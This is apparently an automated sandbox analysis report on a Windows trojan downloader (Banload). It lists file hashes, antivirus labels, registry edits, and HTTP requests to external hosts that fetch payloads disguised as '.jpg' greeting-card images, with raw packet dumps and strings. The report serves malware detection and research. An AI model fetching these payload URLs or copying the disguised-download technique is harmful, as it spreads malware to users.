Analysis Date2013-12-27 00:19:53
MD51e838696e99c330c8850ac0de753d0e9
SHA1297fde554740f9b26ec90100515e63f69cc20794

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section md5: ab73c0544b4638106b053c0d013ab3b9 sha1: 6eb5e57802e811d2c0557469ce79bbf70be3e7b3 size: 18432
Section md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.petite md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section md5: 31162c9a6c33a3466b9d89ba82106627 sha1: 84985cfdb951b1db5518e6eb7d017369f098064e size: 512
Section md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rsrc md5: 8603c3b1d909916ed697e74de7c8ad48 sha1: 4434fd917163e4da9ee26c2238e14c722418978c size: 1413
Section md5: 39d864adc37b90661bdd635464adedb1 sha1: 0dc8bbb2124535028d8975502ce1050bf54036ab size: 6656
Timestamp1992-06-19 22:22:17
PackerPetite v2.2 -> www.un4seen.com/petite
PEhash82a83a48fc0f2003aa815c736e637a56af195999
AVavgDownloader.Small.56.U
AVmsseTrojanDownloader:Win32/Banload.gen!F
AVaviraTR/Dldr.Delphi.Gen
AVmcafeeDownloader.ea

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Winsock DNSwww.helenice.com
Winsock DNSpaginas.terra.com.br
Winsock URLhttp://www.helenice.com/Cartao%20Natal.jpg.jpg
Winsock URLhttp://paginas.terra.com.br/relacionamento/cartaodeamor/update.jpg

Network Details:

DNSwww.terra.com.br
Type: A
200.154.56.80
DNShelenice.com
Type: A
174.120.99.194
DNSpaginas.terra.com.br
Type: A
DNSwww.helenice.com
Type: A
HTTP GEThttp://paginas.terra.com.br/relacionamento/cartaodeamor/update.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.helenice.com/Cartao%20Natal.jpg.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 200.154.56.80:80
Flows TCP192.168.1.1:1033 ➝ 174.120.99.194:80

Raw Pcap
0x00000000 (00000)   47455420 2f72656c 6163696f 6e616d65   GET /relacioname
0x00000010 (00016)   6e746f2f 63617274 616f6465 616d6f72   nto/cartaodeamor
0x00000020 (00032)   2f757064 6174652e 6a706720 48545450   /update.jpg HTTP
0x00000030 (00048)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000040 (00064)   2a0d0a41 63636570 742d456e 636f6469   *..Accept-Encodi
0x00000050 (00080)   6e673a20 677a6970 2c206465 666c6174   ng: gzip, deflat
0x00000060 (00096)   650d0a55 7365722d 4167656e 743a204d   e..User-Agent: M
0x00000070 (00112)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000080 (00128)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000090 (00144)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x000000a0 (00160)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x000000b0 (00176)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x000000c0 (00192)   3a207061 67696e61 732e7465 7272612e   : paginas.terra.
0x000000d0 (00208)   636f6d2e 62720d0a 436f6e6e 65637469   com.br..Connecti
0x000000e0 (00224)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000f0 (00240)   0d0a                                  ..

0x00000000 (00000)   47455420 2f436172 74616f25 32304e61   GET /Cartao%20Na
0x00000010 (00016)   74616c2e 6a70672e 6a706720 48545450   tal.jpg.jpg HTTP
0x00000020 (00032)   2f312e31 0d0a4163 63657074 3a202a2f   /1.1..Accept: */
0x00000030 (00048)   2a0d0a41 63636570 742d456e 636f6469   *..Accept-Encodi
0x00000040 (00064)   6e673a20 677a6970 2c206465 666c6174   ng: gzip, deflat
0x00000050 (00080)   650d0a55 7365722d 4167656e 743a204d   e..User-Agent: M
0x00000060 (00096)   6f7a696c 6c612f34 2e302028 636f6d70   ozilla/4.0 (comp
0x00000070 (00112)   61746962 6c653b20 4d534945 20362e30   atible; MSIE 6.0
0x00000080 (00128)   3b205769 6e646f77 73204e54 20352e31   ; Windows NT 5.1
0x00000090 (00144)   3b205356 313b202e 4e455420 434c5220   ; SV1; .NET CLR 
0x000000a0 (00160)   322e302e 35303732 37290d0a 486f7374   2.0.50727)..Host
0x000000b0 (00176)   3a207777 772e6865 6c656e69 63652e63   : www.helenice.c
0x000000c0 (00192)   6f6d0d0a 436f6e6e 65637469 6f6e3a20   om..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 0d0a7469   Keep-Alive....ti
0x000000e0 (00224)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000f0 (00240)   0d0a                                  ..


Strings
#+3;CScs
DVCLAL
PACKAGEINFO
`3n16L
6!%6s|
9"K8kq
advapi32.dll
akb0%NN
^>!BJOf8
CharNextA
Corrupt Data!
,DDA$X
^DrM|]
[ejq+E
ERROR!
ExitProcess
'f$alt
f+It.%
f(j=m+{
GetACP
GetModuleHandleA
GetProcAddress
g"(f~-
GlobalAlloc
GlobalFree
kernel32.dll
KFwj&B
KkHkB=
k~>XY 
LoadLibraryA
LocalAlloc
 =Lzwz
[m+|9C
mctV+KhUV~7
MessageBoxA
oleaut32.dll
.petite
.[RD#]
RegCloseKey
sAnjaiY
 s"j'X+
SysFreeString
This program must be run under Win32
URLDownloadToFileA
URLMON.DLL
user32.dll
VirtualProtect
Wiws9JZ
WQ9K(>/La
wsprintfA
^xR##iTI
XZyaafY
>Y4V?3
y\z_r+r]